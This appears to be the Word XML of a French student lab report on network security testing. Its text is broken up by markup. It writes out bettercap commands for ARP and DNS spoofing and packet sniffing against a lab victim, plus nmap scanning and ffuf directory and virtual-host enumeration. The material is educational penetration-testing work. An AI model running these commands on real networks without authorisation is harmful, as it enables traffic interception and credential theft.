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Pour la SUCCURSALE : </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002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 le VLAN 10 :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Afin de tester la sécurité du réseau, on commence par analyser le réseau.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000004">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/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u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ARP SPOOFING </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006">
      <w:pPr>
        <w:pStyle w:val="Heading2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Avant la sécurisation :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On commence par attaquer à l’aide d’une attaque ARP : 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Pour cela : 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On utilise l’outil bettercap 2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Pour l’installer :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sudo apt install bettercap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Pour le lancer :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sudo bettercap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Une fois bettercap lancer, on entre dans le shell les commandes suivantes :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net.probe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→Afin de lancer la détection automatique des hôtes sur le réseau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net.show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→Est utilisée pour afficher les informations sur les hôtes et les périphériques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connectés sur le réseau tel que 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Les adresses IP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Les adresses MAC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Les noms d'hôtes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Les fournisseurs de services Internet (ISP) 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Ici, notre victime à pour adresse IP : 192.168.11.12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Ensuite on teste la vulnérabilités à l’ARP SPOOFING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Toujours dans bettercap : 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set arp.spoof.targets 192.168.11.12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→Pour spécifier la cible de l'attaque ARP Spoofing.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arp.spoof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Pour démarrer l’attaque ARP Spoofing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Sur la victime : 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La victime à bien pour adresse IP : 192.168.11.12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Le cache ARP est bien empoisonné !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Afin de voir quel site consulte la victime on utilise : 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net.sniff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Pour activer la capture de paquets en temps réel sur le réseau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9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La victime à consulté le site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DNS SPOOFING :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002B">
      <w:pPr>
        <w:pStyle w:val="Heading2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Après la sécurisation :  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On recommence une attaque ARP SPOOFING.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Puis toujours dans bettercap 2 on tape les commandes suivantes : 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set dns.spoof.domains hacked_by_M3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→Spécifie les noms de domaine à spoofing pour les attaques de phishing ou de redirection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15000" cy="3524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Sur la victime : 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19725" cy="400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u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SCAN DES PORTS : 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nmap -A 192.168.11.0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On peut voir qu’aucun port n’est visible.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0" w:before="0" w:line="276" w:lineRule="auto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0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_lnxbz9" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FUFF : 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5nkun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ffuf : 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apt-get install ffuf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ksv4u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Sous-domaines : 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Pour énumérer les sous-domaines on vient télécharger le fichier raft-large-directories.txt au préalable puis on fait la commande.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Récupérer le fichier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ici</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> pour pouvoir utiliser la commande d’après.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ffuf -u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https://web.societea1.lan</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/FUZZ/ -w ~/tools/-tools/Seclists/Discovery/Web-Content/raft-large-directories.txt -c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Ici on trouve 3 sous domaines avec les codes erreur suivants 301, 403 et le 200 : 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869392" cy="25479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392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spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="0000ff"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_44sinio" w:id="16"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0000ff"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="2832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jxsxq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Hôtes Virtuel : </w:t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Pour énumérer les Hôtes Virtuel on vient télécharger le fichier bitquark-subdomains-top100000.txt au préalable puis on fait la commande.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sz w:val="4"/>
          <w:szCs w:val="4"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Le fichier à télécharger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ici</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="4"/>
          <w:szCs w:val="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ffuf -u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https://web.societea1.lan</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -H “Host: FUZZ.web.societea1.lan” -w ~/tools/-tools/Seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -c -fs 169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lab.com/kalilinux/packages/seclists/blob/f8146198d2359eaaabd0bd18b4afa880965449e8/Discovery/DNS/bitquark-subdomains-top100000.txt" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://youtube.com" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.societea1.lan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s://web.societea1.lan" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gitlab.com/kalilinux/packages/seclists/-/blob/b83a756bb2c06f94c03e525326e8480981b58a9c/Discovery/Web-Content/raft-large-directories.txt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